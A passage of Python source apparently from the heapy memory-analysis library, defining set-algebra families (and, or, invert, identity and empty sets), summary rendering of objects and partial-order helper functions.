return self.fam.Classifiers.mker_dictof(self)
dictof = property_exp(_get_dictof)
def _get_refdby(self):
return self.fam.Classifiers.mker_refdby(self)
refdby = property_exp(_get_refdby)
def sokind(self, *args, **kwds):
return self.classifier.get_sokind(self, *args, **kwds)
class MappingProxy(object):
__slots__ = '_set_',
def __init__(self, set):
self._set_ = set
def __getattribute__(self, name):
if name == '_set_':
return object.__getattribute__(self, name)
return self._set_.fam.maprox_getattr(self._set_, name)
def __getitem__(self, name):
return self._set_.fam.maprox_getitem(self._set_, name)
class Family:
supercl = None
def __init__(self, mod):
self.mod = mod
self.Doc = mod._parent.Doc
self._hiding_tag_ = mod._hiding_tag_
self.types = mod.types
self.disjoints = mod.immnodeset()
self.export_dict = self.mod.export_dict
self.supers = mod.immnodeset([self])
self.Set = Kind
def __call__(self, arg):
return self.Set(self, arg)
def _derive_origin_(self, origin):
return self.Doc.add_origin(self, origin)
def specotup(self, tup):
r = self.Set(self, tup)
r = self.Doc.add_origin(r, self.Doc.callfunc(self, *tup))
return r
def specoarg(self, arg):
r = self.Set(self, arg)
r = self.Doc.add_origin(r, self.Doc.callfunc(self, arg))
return r
def specoargtup(self, arg, tup):
r = self.Set(self, arg)
r = self.Doc.add_origin(r, self.Doc.callfunc(self, *tup))
return r
def add_export(self, name, value):
if self.export_dict is self.mod.export_dict:
self.export_dict = self.mod.export_dict.copy()
if name in self.export_dict and self.export_dict[name] is not value:
raise ValueError('Duplicate: %s' % name)
self.export_dict[name] = value
def c_alt(self, a, cmp):
raise ValueError('No alternative set for family %s.' % self)
def c_binop(self, op, a, b):
if not isinstance(b, UniSet):
b = self.c_uniset(b)
r = getattr(self, 'c_'+op)(a, b)
# r = self.Doc.add_origin(r, self.Doc.binop(op, a.doc, b.doc))
return r
def c_unop(self, op, a):
r = getattr(self, 'c_'+op)(a)
# r = self.Doc.add_origin(r, self.Doc.unop(op, a.doc))
return r
def c_derive_origin(self, a, b):
return self.Doc.add_origin(a, b)
def c_call(self, a, args, kwds):
raise ValueError('Not callable set')
def c_contains(self, a, b):
mod = self.mod
return (a & mod.iso(b)) is not mod.Nothing
def c_get_biper(self, a):
return self.mod.Classifiers.biper(a)
def c_get_dictof(self, a):
return self.mod.Classifiers.dictof(a)
def c_disjoint(self, a, b):
# Determine if a, b are disjoint
return (a & b) is self.mod.Nothing
def c_factordisjoint(self, a, b):
# Given a and b factors, and not a <= b and not b <= a,
# determine if they are disjoint
return getattr(self, '_factordisjoint_%s' % (b.fam.opname,))(a, b)
def c_get_brief_alt(self, a, alt):
return '[%s %s]' % (alt, self.c_get_brief(a))
def c_uniset(self, X):
return self.mod.uniset_from_setcastable(X)
def c_get_examples(self, a, env):
return []
def c_getattr(self, a, b, args=(), kwds={}):
d = self.export_dict
if b in d:
return d[b](a, *args, **kwds)
return self.c_getattr2(a, b)
def c_getattr2(self, a, b):
raise AttributeError(b)
def c_get_render(self, a):
return self.mod.summary_str.str_address
def c_get_str_for(self, a, b):
# A modification of str, for some cases,
# when the set a is used as a determination of an idset b
# Normally the same as brief, but.. 'dict of' will be different for eg module
return a.brief
def c_get_idpart_header(self, a):
render = a.get_render()
h = getattr(render, 'im_func', render)
h = getattr(h, '_idpart_header', None)
if not h:
h = 'Value'
return h
def c_get_idpart_label(self, a):
return '<%s>' % a
def c_get_idpart_render(self, a):
return self.c_get_render(a)
def c_get_idpart_sortrender(self, a):
render = self.c_get_idpart_render(a)
if render is repr:
return 'IDENTITY'
h = getattr(render, 'im_func', render)
render = getattr(h, '_idpart_sortrender', render)
return render
def c_hash(self, a):
return hash(a.arg)
def c_iter(self, a):
raise TypeError('iteration over non-sequence')
def c_len(self, a):
raise TypeError('len() of unsized object')
def c_nonzero(self, a):
return True
def c_mul(self, a, b):
return self.mod._parent.Spec.cprod(a, b)
def c_lshift(self, a, b):
return self.Doc.add_origin(self.c_map(a, b), self.Doc.binop('lshift', a, b))
def c_map(self, a, b):
if isinstance(b, list):
b = tuple(b)
if not isinstance(b, tuple):
b = b,
t = b + ('->', a)
return self.mod._parent.Spec.mapping(*t)
def c_repr(self, a):
return self.c_str(a)
def c_str(self, a):
return self.c_get_brief(a)
def c_sub(self, a, b):
return a & ~b
def c_test_contains(self, a, b, env):
if not self.c_contains(a, b):
return env.failed('%s: %s does not contain %s' % (self.__class__, env.name(a), env.name(b)))
return True
def c_xor(self, a, b):
return (a - b) | (b - a)
def _or_OR(self, a, b):
return b.fam._or_TERM(b, a)
def _rand_ATOM(self, a, b):
return self._and_ATOM(a, b)
class AtomFamily(Family):
isatom = True
isfactor = True
opname = 'ATOM'
def __init__(self, mod):
Family.__init__(self, mod)
self.disjoints |= [self]
def c_and(self, a, b):
return b.fam._and_ATOM(b, a)
def _and_ATOM(self, a, b):
return self.mod.fam_And(a, b)
def _and_AND(self, a, b):
return b.fam._and_ATOM(b, a)
def _and_FACTOR(self, a, b):
return self.mod.fam_And(a, b)
def _and_INVERT(self, a, b):
return b.fam._and_ATOM(b, a)
def _factordisjoint_ATOM(self, a, b):
return (a.fam.disjoints & b.fam.supers or
b.fam.disjoints & a.fam.supers)
def _factordisjoint_INVERT(self, a, b):
return b.fam._factordisjoint_ATOM(b, a)
def c_le(self, a, b):
return b.fam._ge_ATOM(b, a)
_le_AND = _le_INVERT = _le_AND = c_le
def _le_ATOM(self, a, b):
# b is known to not be Nothing since its c_ge doesn't call back
return self.supercl is not None and self.supercl <= b
def c_ge(self, a, b):
return b.fam._le_ATOM(b, a)
_ge_INVERT = _ge_AND = c_ge
def _ge_ATOM(self, a, b):
# b is known to not be Nothing since its c_le doesn't call back
return b.fam.supercl is not None and b.fam.supercl <= a
def c_or(self, a, b):
return b.fam._or_ATOM(b, a)
def _or_ATOM(self, a, b):
return self.mod.fam_Or(a, b)
_or_AND = _or_INVERT = c_or
def c_invert(self, a):
return self.mod.fam_Invert(a)
def defrefining(self, arg):
self.supercl = arg
self.supers |= arg.fam.supers
def defdisjoint(self, *args):
# Define disjointness of sets under the condition that
# neither of them is a subset of the other (determined in some other way.)
# I.E., define that there is no partial overlap.
# Declare that all sets of my (self) family are disjoint under this condition
# from all sets of each family in args.
self.disjoints |= args
sc = self.supercl
if sc is not None:
self.disjoints |= sc.fam.disjoints
def defrefidis(self, arg):
self.defrefining(arg)
self.defdisjoint(arg.fam)
def fam_union(self):
return self.supercl
class ArgAtomFamily(AtomFamily):
def _and_ID(self, a, b):
cla, k, cmp = self.c_get_ckc(a)
return cla.select_ids(b, k, cmp)
def _ge_ATOM(self, a, b):
# b is known to not be Nothing since its c_le doesn't call back
if self is b.fam:
return a.arg == b.arg
return b.fam.supercl is not None and b.fam.supercl <= a
def _le_ATOM(self, a, b):
# b is known to not be Nothing since its c_ge doesn't call back
if self is b.fam:
return a.arg == b.arg
return self.supercl is not None and self.supercl <= b
def c_get_ckc(self, a):
return self.classifier, a.arg, '=='
class AndFamily(Family):
opname = 'AND'
isatom = False
isfactor = False
def __call__(self, a, b):
if a <= b:
return a
if b <= a:
return b
if a.fam.c_factordisjoint(a, b):
return self.mod.Nothing
return self._cons((a, b))
def _cons(self, arg):
# We allow explicit non-normalized constructions, as an optimization
# for a in arg:
# assert a.fam.isatom or isinstance(a.fam, InvertFamily)
if len(arg) > 1:
return self.Set(self, tuple(arg))
elif len(arg) == 1:
return arg[0]
else:
return self.mod.Nothing
def c_get_examples(self, a, env):
ex = []
for ai in a.arg:
try:
e = env.get_examples(ai)
except CoverageError:
pass
else:
for ei in list(e):
for aj in a.arg:
if aj is not ai:
if not env.contains(aj, ei):
break
else:
ex.append(ei)
return ex
def c_and(self, a, b):
return b.fam._and_AND(b, a)
def _and_AND(self, a, b):
for b in b.arg:
a &= b
return a
def _and_FACTOR(self, a, b):
# a0 & a1 & ... & b
xs = []
for ai in a.arg:
if ai <= b:
return a
elif b <= ai:
pass
elif ai.fam.c_factordisjoint(ai, b):
return self.mod.Nothing
else:
xs.append(ai)
xs.append(b)
return self._cons(xs)
_and_ATOM = _and_INVERT = _and_FACTOR
def _and_ID(self, a, b):
b = a.arg[0] & b
for a in a.arg[1:]:
if b is self.mod.Nothing:
break
b = a & b
return b
def c_le(self, a, b):
return b.fam._ge_AND(b, a)
def _le_TERM(self, a, b):
b = a & b
if b.fam is not self or len(b.arg) != len(a.arg):
return False
for x in a.arg:
for y in b.arg:
if x <= y:
break
else:
return False
return True
_le_ATOM = _le_INVERT = _le_AND = _le_TERM
def c_ge(self, a, b):
return b.fam._le_AND(b, a)
def _ge_TERM(self, a, b):
for a in a.arg:
if not a >= b:
return False
return True
_ge_ATOM = _ge_INVERT = _ge_AND = _ge_TERM
def c_or(self, a, b):
return b.fam._or_AND(b, a)
def _or_AND(self, a, b):
# a0 & a1 ... | b0 & b1 ...
# =
Omega = ~self.mod.Nothing
for i, ai in enumerate(a.arg):
for j, bj in enumerate(b.arg):
if ai | bj == Omega:
aa = self._cons(a.arg[:i] + a.arg[i+1:])
bb = self._cons(b.arg[:j] + b.arg[j+1:])
if aa == bb:
return aa
return self.mod.fam_Or(a, b)
def _or_TERM(self, a, b):
# a0 & a1 ... | b
if a <= b:
return b
if b <= a:
return a
xs = []
for ai in a.arg:
aib = ai | b
if aib.fam.isfactor:
xs.append(aib)
else:
break
else:
r = ~self.mod.Nothing
for x in xs:
r &= x
return r
return self.mod.fam_Or(a, b)
_or_ATOM = _or_INVERT = _or_TERM
def c_invert(self, a):
# ~(a0 & a1 ...) = ~a0 | ~a1 ...
r = self.mod.Nothing
for ai in a.arg:
r |= ~ai
return r
def c_contains(self, a, b):
for x in a.arg:
if b not in x:
return False
return True
def c_test_contains(self, a, b, env):
for x in a.arg:
if not env.test_contains(x, b, 'and'):
return env.failed('Failed')
return True
def c_disjoint3(self, a, b):
return (a & b) is self.mod.Nothing
def c_get_render(self, c):
for kind in c.arg:
r = kind.get_render()
if r:
return r
def r(o):
return hex(id(o))
return r
def c_get_brief(self, c):
names = [kind.brief for kind in c.arg]
# names.sort() ?? I think now I want them in given order.
return '(%s)' % ' & '.join(names) + ')'
def c_get_ckc(self, a):
return (
self.mod.Classifiers.mker_and([x.biper for x in a.arg]).classifier,
(0,)*len(a.arg),
'=='
)
def c_repr(self, a):
reprs = [repr(k) for k in a.arg]
return '(%s)' % ' & '.join(reprs)
class OrFamily(Family):
opname = 'OR'
isatom = False
isfactor = False
def __call__(self, a, b):
if b <= a:
return a
if a <= b:
return b
return self._cons((a, b))
def _cons(self, arg):
# Must only be called with maximalized args
for a in arg:
assert a.fam.isfactor or isinstance(a.fam, AndFamily)
if len(arg) > 1:
return Family.__call__(self, tuple(arg))
elif len(arg) == 1:
return arg[0]
else:
return self.mod.Nothing
def c_contains(self, a, b):
for x in a.arg:
if b in x:
return True
return False
def c_get_ckc(self, a):
return self.mod.Use.findex(*a.arg).classifier, len(a.arg), '<'
def c_get_examples(self, a, env):
exa = [iter(env.get_examples(x)) for x in a.arg]
while 1:
n = 0
for i, e in enumerate(exa):
if e is not None:
try:
yield next(e)
except StopIteration:
exa[i] = None
else:
n += 1
if not n:
break
def c_test_contains(self, a, b, env):
return env.forsome(a.arg, lambda x: env.test_contains(x, b, 'Some x'), 'or')
def c_and(self, a, b):
if self is b.fam:
return self._and_OR(a, b)
else:
return self._and_TERM(a, b)
def _and_TERM(self, a, b):
# (a0 | a1 ..) & b = a0 & b | a1 & b | ...
r = self.mod.Nothing
for a in a.arg:
r |= a & b
return r
_and_ATOM = _and_INVERT = _and_AND = _and_TERM
def _and_OR(self, a, b):
# (a0 | a1 ..) & (b0 | b1 ..) = a0 & b0 | a0 & b1 ... a1 & b0 | a1 & b1 ...
r = self.mod.Nothing
for a in a.arg:
for bi in b.arg:
r |= a & bi
return r
def _and_ID(self, a, b):
ai = a.arg[0]
r = ai.fam._and_ID(ai, b)
for ai in a.arg[1:]:
r |= ai.fam._and_ID(ai, b)
return r
def _ge_TERM(self, a, b):
a = a & b
if a.fam is self:
if b.fam is not a.fam or len(b.arg) != len(a.arg):
return False
assert 0
else:
return b <= a
_ge_ATOM = _ge_INVERT = _ge_AND = _ge_TERM
def c_ge(self, a, b):
if b.fam is self:
return self.c_le(b, a)
else:
return self._ge_TERM(a, b)
def c_le(self, a, b):
for x in a.arg:
if not x <= b:
return False
return True
_le_ATOM = _le_INVERT = _le_AND = c_le
def c_or(self, a, b):
return b.fam._or_OR(b, a)
def _or_TERM(self, a, b):
# a0 | a1 ... | b
xs = []
lt = False
for a in a.arg:
if not b >= a:
xs.append(a)
if b <= a:
lt = True
if not lt:
xs.append(b)
return self._cons(xs)
_or_ATOM = _or_INVERT = _or_AND = _or_TERM
def _or_OR(self, a, b):
# (a0 | a1 ...) | (b0 | b1 ...)
xs = maximals(a.arg + b.arg)
return self._cons(xs)
def c_invert(self, a):
# ~(a0 | a1 ...) = ~a0 & ~a1 ...
r = ~a.arg[0]
for ai in a.arg[1:]:
r &= ~ai
return r
def c_get_render(self, c):
renders = self.mod.mutnodeset([kind.get_render() for kind in c.arg])
if len(renders) == 1:
return list(renders)[0]
else:
def r(o):
return hex(id(o))
r._idpart_header = 'Address'
r._idpart_sortrender = lambda x: id(x)
return r
def c_get_brief(self, c):
names = [kind.brief for kind in c.arg]
names.sort()
return '(' + ' | '.join(names) + ')'
def c_get_idpart_header(self, a):
return 'Brief'
def c_get_idpart_label(self, a):
return '<mixed>'
def c_get_idpart_render(self, a):
er = self.mod.Use.Clodo
cla = er.classifier
cli = cla.cli
brmemo = {}
def render(x):
k = cli.classify(x)
br = brmemo.get(k)
if br is None:
kind = cla.get_kind(k)
b = cla.get_kind(k).brief
r = kind.get_render()
br = (b, r)
brmemo[k] = br
b, r = br
return '%s: %s' % (b, r(x))
return render
def c_get_idpart_sortrender(self, a):
er = self.mod.Use.Clodo
cla = er.classifier
cli = cla.cli
brmemo = {}
def render(x):
k = cli.classify(x)
br = brmemo.get(k)
if br is None:
kind = cla.get_kind(k)
b = cla.get_kind(k).brief
r = kind.fam.c_get_idpart_sortrender(kind)
br = (b, r)
brmemo[k] = br
else:
b, r = br
if r != 'IDENTITY':
x = r(x)
return (b, x)
return render
def c_repr(self, a):
reprs = [repr(k) for k in a.arg]
reprs.sort()
return '(%s)' % ' | '.join(reprs)
class InvertFamily(Family):
opname = 'INVERT'
isatom = False
isfactor = True
def __call__(self, a):
assert a.fam.isatom
if a is self.mod.Nothing:
return self.mod.NotNothing
else:
return Family.__call__(self, a)
def c_test_contains(self, a, b, env):
return env.test_contains_not(a.arg, b, 'InvertFamily')
def c_contains(self, a, b):
return not b in a.arg
def c_and(self, a, b):
return b.fam._and_INVERT(b, a)
_and_AND = c_and
def _and_FACTOR(self, a, b):
# ~a.arg & ~b.arg
# ~a.arg & b
# Is normal form?
x = a.arg & b
if x.fam.isatom:
a = self(x)
return self.mod.fam_And(a, b)
_and_ATOM = _and_INVERT = _and_FACTOR
def _and_ID(self, a, b):
return b - (b & a.arg)
def _factordisjoint_ATOM(self, a, b):
# ~ a.arg <disjoint> b
return b <= a.arg
def _factordisjoint_INVERT(self, a, b):
# ~ a.arg <disjoint> ~b.arg
return False
def c_le(self, a, b):
return b.fam._ge_INVERT(b, a)
_le_AND = c_le
def _le_ATOM(self, a, b):
# ~a.arg <= b
return False
def _le_INVERT(self, a, b):
# ~a.arg <= ~b.arg
return b.arg <= a.arg
def c_ge(self, a, b):
# ~a.arg >= b
return a.arg.disjoint(b)
_ge_ATOM = _ge_INVERT = _ge_AND = c_ge
def c_or(self, a, b):
return b.fam._or_INVERT(b, a)
_or_AND = c_or
def _or_FACTOR(self, a, b):
# ~a.arg | b
if a.arg <= b:
return ~self.mod.Nothing
x = a.arg & b
if x is self.mod.Nothing:
return a
return self.mod.fam_Or(a, b)
_or_ATOM = _or_INVERT = _or_FACTOR
def c_invert(self, a):
# ~(~a.arg) = a.arg
return a.arg
def c_get_render(self, a):
return a.arg.get_render()
def c_get_brief(self, a):
n = a.arg.brief
if (not (n.startswith('(') or n.startswith('<')) and
' ' in n):
n = '(%s)' % n
return '~%s' % n
def c_get_ckc(self, a):
# This uses only existing machinery for C-level classification.
# The alternatives are discussed in Notes 21 Sep 2005.
return (
a.arg.biper.classifier,
0,
'!='
)
def c_repr(self, a):
return '~%s' % repr(a.arg)
class FamilyFamily(AtomFamily):
def __init__(self, mod):
AtomFamily.__init__(self, mod)
self.add_export('union', lambda x: x.arg.fam_union())
def c_contains(self, a, b):
return isinstance(b, UniSet) and b.fam is a.arg
def c_get_brief(self, c):
return '<Family: %s>' % c.arg.__class__
class IdentitySetFamily(AtomFamily):
def __init__(self, mod):
AtomFamily.__init__(self, mod)
self.defrefining(mod.Anything)
self.immnodeset = mod.immnodeset
self.Part = mod.Part
self.Path = mod.Path
self.RefPat = mod.RefPat
self.View = mod.View
self.Use = mod.Use
def __call__(self, *args, **kwds):
return self._cons(args, **kwds)
def _cons(self, arg, er=None):
# arg is a sequence of nodes
arg = self.immnodeset(arg)
if not arg:
return self.mod.Nothing
elif len(arg) == 1:
r = IdentitySetSingleton(self, tuple(arg)[0])
else:
r = IdentitySetMulti(self, arg)
if er is not None:
r._er = er
return r
def c_and(self, a, b):
if b.fam is self:
return self._cons(a.nodes & b.nodes)
elif b.fam is self.mod.fam_Invert:
return self._and_INVERT(a, b)
else:
return b.fam._and_ID(b, a)
def _and_ATOM(self, a, b):
if b.fam is self:
return self._cons(a.nodes & b.nodes)
else:
return b.fam._and_ID(b, a)
def _and_AND(self, a, b):
return b.fam._and_ID(b, a)
def _and_ID(self, a, b):
return self._cons(a.nodes & b.nodes)
def _and_INVERT(self, a, b):
if b.arg.fam is self:
return self._cons(a.nodes - b.arg.nodes)
elif b is self.mod.NotNothing:
return a
else:
return b.fam._and_ID(b, a)
def c_get_ckc(self, a):
return self.mod.Classifiers.Idset.classifier, a.nodes, '<='
def c_hash(self, a):
return hash(a.nodes)
def c_iter(self, a):
# It's not well-defined to iterate and is considered error-prone
# and may be SO much slower than expected
# they need to be explicit to iterate over elements or partition subset
raise TypeError('iteration over non-sequence')
def c_len(self, a):
# The length corresponds to
# o the number of rows in how it is printed
# o the max getitem-wise index + 1
# (Notes May 13 2005)
return a.partition.numrows
def c_contains(self, a, b):
return b in a.nodes
def c_le(self, a, b):
if not b.fam is self:
b = b.fam._and_ID(b, a)
return a.nodes <= b.nodes
_le_ATOM = _le_INVERT = _le_AND = c_le
def c_or(self, a, b):
if b.fam is self:
return self._cons(a.nodes | b.nodes)
else:
a = a - b.fam._and_ID(b, a)
return b.fam._or_ATOM(b, a)
_or_ATOM = _or_INVERT = _or_AND = _or_OR = c_or
def c_get_brief(self, c):
return self.get_str_summary(c)
def c_get_render(self, a):
return a.kind.get_render()
def c_getitem(self, a, idx):
return a.partition.get_set(idx)
def c_str(self, a):
return a.more._oh_printer.get_str_of_top()
def maprox_getattr(self, set, name):
ns = self.mod.mutnodeset()
for x in set.nodes:
try:
v = getattr(x, name)
except AttributeError:
pass
else:
ns.add(v)
return self._cons(self.mod.immnodeset(ns))
def maprox_getitem(self, set, idx):
ns = self.mod.mutnodeset()
for x in set.nodes:
try:
v = x[idx]
except (KeyError, IndexError):
pass
else:
ns.add(v)
return self._cons(self.mod.immnodeset(ns))
def c_get_idpart_header(self, a):
return 'Kind: Name/Value/Address'
def c_get_idpart_label(self, a):
return ''
def c_get_idpart_render(self, a):
def render(x):
x = self.mod.iso(x)
r = x.brief.lstrip('<1 ').rstrip('>')
return r
return render
def get_by(self, a, er):
ers = []
if isinstance(er, EquivalenceRelation):
ers.append(er)
else:
try:
ss = er.split('&')
except Exception:
raise TypeError(
'by(): Equivalence relation or string expected.')
if ss == ['']:
ss = []
for s in ss:
try:
if not s.istitle() or s.startswith('er_'):
s = 'er_'+s
er = getattr(self.Use, s)
except AttributeError:
raise ValueError(
'by(): No such equivalence relation defined in heapy.Use: %r' % s)
ers.append(er)
if not ers:
er = self.Use.Unity
else:
er = ers[0]
for i in range(1, len(ers)):
er &= ers[i]
if a.er is not er:
a = self._cons(a.nodes, er=er)
return a
def get_er(self, a):
try:
er = a._er
except AttributeError:
er = self.mod.Use.Clodo
a._er = er
return er
def get_more(self, a):
try:
m = a._more
except AttributeError:
m = self.mod.OutputHandling.more_printer(a, a.partition)
a._more = m
return m
def get_all(self, a):
return a.more.all
def get_owners(self, a):
return self.mod.Use.Clodo.classifier.owners(a)
def get_partition(self, a):
try:
p = a._partition
except AttributeError:
a.fam.View.clear_check()
p = a.fam.Part.partition(a, a.er)
a._partition = p
return p
def get_str_idpart(self, set, cla):
# Get the string that is used for the 'identity partition'
# when the objects share a common classification (cla)
s = cla.fam.c_get_str_for(cla, set)
return s
def get_str_refpat(self, set, cla, max_length):
# Get the string that is used at the end of a reference pattern line
strs = []
strs.append('%d ' % set.count)
strs.append(cla.fam.c_get_str_for(cla, set))
strs.append(': ')
strs.append(self.get_str_rendered(
set, cla, max_length-len(''.join(strs))))
s = ''.join(strs)
if len(s) > max_length:
s = s[:max_length - 3]+'...'
return s
def get_str_rendered(self, set, cla, max_length=None):
if max_length is None:
max_length = 50
strs = []
lens = 0
render = cla.get_render()
for p in set.nodes:
rs = render(p)
if lens and lens + len(rs) + 2 >= max_length:
strs[-1] += '...' # but what can be done in limited time
break
lens += len(rs) + 2
strs.append(rs)
strs.sort()
return ', '.join(strs)
def get_str_summary(self, c, max_length=None, er=None):
if max_length is None:
max_length = self.mod.max_summary_length
if er is None:
er = c.er
set = c.nodes
items = er.classifier.partition(set)
keys = [k for k, v in items]
cla = reduce(lambda x, y: x | y, keys)
s = '<%d %s' % (len(set), cla.fam.c_get_str_for(cla, c))
s += ': '
bslen = len(s)
bstrs = []
for cla, set in items:
css = self.get_str_rendered(set, cla, max_length-bslen)
if len(items) > 1:
css = '<%d %s: %s>' % (set.count, cla, css)
bstrs.append(css)
bslen += len(css) + 3
if bslen > max_length:
break
# Don't use the initial count when comparing
if len(bstrs) > 1:
bstrs.sort(key=lambda x: x[x.index(' '):])
s += ' | '.join(bstrs) + '>'
if len(s) > max_length:
s = s[:max_length-4]+'...>'
return s
def get_parts(self, X):
return [x for x in X.partition.get_sets()]
def get_theone(self, set):
if len(set.nodes) == 1:
return list(set.nodes)[0]
raise ValueError('theone requires a singleton set')
def get_prod(self, set):
obj = self.get_theone(set)
self.mod.Use._check_tracemalloc()
tb = self.mod.tracemalloc.get_object_traceback(obj)
if tb is None:
return
try:
frames = tb.format(most_recent_first=True)
except TypeError:
# Py < 3.7
frames = tb.format()
# TODO: move to a delicated file
class Printer:
def _oh_get_line_iter(self):
yield 'Traceback (most recent call first):'
yield from frames
printer = Printer()
printer.mod = self.mod
self.mod.OutputHandling.setup_printing(printer)
return printer
class EmptyFamily(IdentitySetFamily):
# Inherits from IdentitySetFamily because the special exported methods
# tend to be required by applications.
# There is only one object of EmptyFamily: UniSet.Nothing
# The new method implementations added here are mostly for optimization.
# (Other families may assume the EmptyFamily have these methods.)
# The .nodes is an empty immnodeset so IdentitySetFamily methods should work.
# The main change from IdentitySetFamily is the representations.
def __init__(self, mod):
IdentitySetFamily.__init__(self, mod)
def c_and(self, a, b):
return a
_and_ATOM = _and_INVERT = _and_AND = _and_OR = _and_ID = c_and
def c_contains(self, a, b):
return False
def c_ge(self, a, b):
if b is a:
return True
return False
_ge_ATOM = _ge_INVERT = _ge_AND = c_ge
def c_get_brief(self, a):
return '<Nothing>'
def c_repr(self, a):
return '%s%s' % (self.mod.Use.reprefix, 'Nothing')
def c_iter(self, a):
return iter(())
def c_le(self, a, b):
return True
_le_ATOM = _le_INVERT = _le_AND = c_le
def c_len(self, a):
return 0
def c_nonzero(self, a):
return False
def c_or(self, a, b):
return b
_or_ATOM = _or_INVERT = _or_AND = _or_OR = c_or
def c_str(self, a):
return self.c_get_brief(a)
def c_sub(self, a, b):
return a
def c_xor(self, a, b):
return b
class EquivalenceRelationFamily(AtomFamily):
def __init__(self, mod):
AtomFamily.__init__(self, mod)
self.Set = EquivalenceRelation
self.Use = mod.Use
self.Classifiers = mod.Classifiers
def __call__(self, constructor, *args, **kwds):
# Passing classifier constructor rather than constructed classifier,
# to make sure there is a 1-1 relation between equivalence relations and classifers.
cl = constructor(*args, **kwds)
er = self.Set(self, cl)
cl.er = er
return er
def c_contains(self, a, b):
# XXX should have a smoother protocol
try:
return len(b.by(a)) == 1
except AttributeError:
try:
ckc = b.get_ckc()
except Exception:
return False
else:
return ckc[0].er <= a and ckc[2] == '=='
def c_getattr(self, a, name):
classifier = a.classifier
try:
g = getattr(classifier, 'get_attr_for_er')
except AttributeError:
raise AttributeError(name)
return g(name)
def c_and(self, a, b):
if b.fam is not self:
return AtomFamily.c_and(self, a, b)
ers = []
for x in (a, b):
if x.erargs:
ers.extend(x.erargs)
else:
ers.append(x)
ers = minimals(ers)
if len(ers) == 1:
return ers[0]
er = self.Classifiers.mker_and(ers)
er.erargs = tuple(ers)
return er
def _ge_ATOM(self, a, b):
if b.fam is self:
return a.classifier in b.classifier.super_classifiers
return False
def _le_ATOM(self, a, b):
if b.fam is self:
return b.classifier in a.classifier.super_classifiers
return False
def c_call(self, a, args, kwds):
return a.classifier.get_userkind(*args, **kwds)
def c_get_brief(self, a):
return 'Equiv. relation %s' % a.classifier
def c_getitem(self, a, idx):
return a.classifier.relimg(self.mod.nodeset_adapt(idx))
def c_repr(self, a):
return a.classifier.get_reprname()
class Summary_str:
def __init__(self, mod):
self.mod = mod
types = mod.types._module
self.invtypes = {}
for k, v in sorted(types.__dict__.items()):
if isinstance(v, type):
self.invtypes[v] = 'types.%s' % k
for k, v in sorted(types.__builtins__.items()):
if isinstance(v, type):
self.invtypes[v] = k
# This is to make common printouts prettier / shorter (: and clearer ? :)
# but may be disabled for clearer repr()
self.shorter_invtypes = {}
for name in ('module', 'function'):
t = getattr(types, name.capitalize()+'Type')
self.shorter_invtypes[t] = name
self.table = {
mod.NodeSet: self.str_address_len,
bool: self.str_repr,
types.BuiltinFunctionType: self.str_builtin_function,
types.CodeType: self.str_code,
complex: self.str_repr,
dict: self.str_address_len,
float: self.str_repr,
types.FrameType: self.str_frame,
types.FunctionType: self.str_function,
int: self.str_repr,
list: self.str_address_len,
type(None): self.str_repr,
types.MethodType: self.str_method,
types.ModuleType: self.str_module,
types.TracebackType: self.str_traceback,
bytes: self.str_limrepr,
str: self.str_limrepr,
tuple: self.str_address_len,
type: self.str_type,
}
def __call__(self, key, longer=False):
x = self.table.get(key)
if x is None:
if issubclass(key, type):
x = self.str_type
else:
x = self.str_address
if longer and 'longer' in x.__func__.__code__.co_varnames:
return lambda k: x(k, longer=longer)
else:
return x
def set_function(self, type, func):
self.table[type] = func
def str_address(self, x):
return hex(id(x))
str_address._idpart_header = 'Address'
str_address._idpart_sortrender = id
def str_address_len(self, x):
return self.str_address(x)+self.str_len(x)
str_address_len._idpart_header = 'Address*Length'
str_address_len._idpart_sortrender = id
def str_builtin_function(self, x):
n = x.__name__
m = x.__module__
if m != 'builtins':
n = '%s.%s' % (m, n)
return n
str_builtin_function._idpart_header = 'Name'
def str_code(self, x):
return '%s:%d:%s' % (self.mod._root.os.path.basename(x.co_filename),
x.co_firstlineno,
x.co_name)
str_code._idpart_header = 'File:Line:Name'
def str_frame(self, x):
return '<%s at %s>' % (x.f_code.co_name, self.str_address(x))
str_frame._idpart_header = 'Name at Address'
def str_function(self, x):
return '%s.%s' % (x.__module__, x.__name__)
str_function._idpart_header = 'Name'
def str_len(self, x):
return '*%d' % len(x)
str_len._idpart_header = 'Length'
def str_method(self, x):
cn = self.str_type(x.__self__.__class__)
if x.__self__ is not None:
cn = '<%s at %s>' % (cn, self.str_address(x.__self__))
func = x.__func__
try:
func_name = func.__func__
except AttributeError:
func_name = func.__name__
return '%s.%s' % (cn, func_name)
str_method._idpart_header = 'Type/<Type at address> . method'
def str_module(self, x):
return x.__name__
str_module._idpart_header = 'Name'
def str_limrepr(self, x):
return self.mod._root.reprlib.repr(x)
str_limrepr._idpart_header = 'Representation (limited)'
str_limrepr._idpart_sortrender = 'IDENTITY'
str_repr = repr
def str_traceback(self, x):
return '<in frame %s at %s>' % (self.str_frame(x.tb_frame), self.str_address(x))
str_traceback._idpart_header = 'Frame at Address'
def str_type(self, x, longer=False):
if x in self.shorter_invtypes and not longer:
return self.shorter_invtypes[x]
if x in self.invtypes:
return self.invtypes[x]
if not hasattr(x, '__module__'):
return f'<unknown module>.{x.__name__}'
return f'{x.__module__}.{x.__name__}'
str_type._idpart_header = 'Name'
def str_type_longer(self, x):
if x in self.invtypes:
return self.invtypes[x]
return '%s.%s' % (x.__module__, x.__name__)
str_type._longer_method = lambda x: str_type
def maximals(A, le=lambda x, y: x <= y):
" Find the maximal element(s) of a partially ordered sequence"
r = []
for x in A:
for a in A:
if le(x, a) and not le(a, x):
break
else:
for a in r:
if le(x, a):
break
else:
r.append(x)
return r
def minimals(A, le=lambda x, y: x <= y):
" Find the minimal element(s) of a sequence of partially ordered elements"
r = []
for x in A:
for a in A:
if le(a, x) and not le(x, a):
break
else:
for a in r:
if le(a, x):
break
else:
r.append(x)
return r
class _GLUECLAMP_:
max_summary_length = 80
auto_convert_type = True
auto_convert_iter = False # Can give problems if enabled; notes 22/11-04
out_reach_module_names = ('UniSet', 'View', 'Path', 'RefPat')
_chgable_ = ('max_summary_length', 'out_reach_module_names',
'auto_convert_type', 'auto_convert_iter', 'output')
# _preload_ = ('_hiding_tag_',)
# Module 'imports'
_imports_ = (
'_parent:Classifiers',
'_parent:ImpSet',
'_parent.ImpSet:emptynodeset',
'_parent.ImpSet:immnodeset',
'_parent.ImpSet:mutnodeset',
'_parent.ImpSet:NodeSet',
'_parent:Part',
'_parent:Path',
'_parent:RefPat',
'_parent:OutputHandling',
'_parent:View',
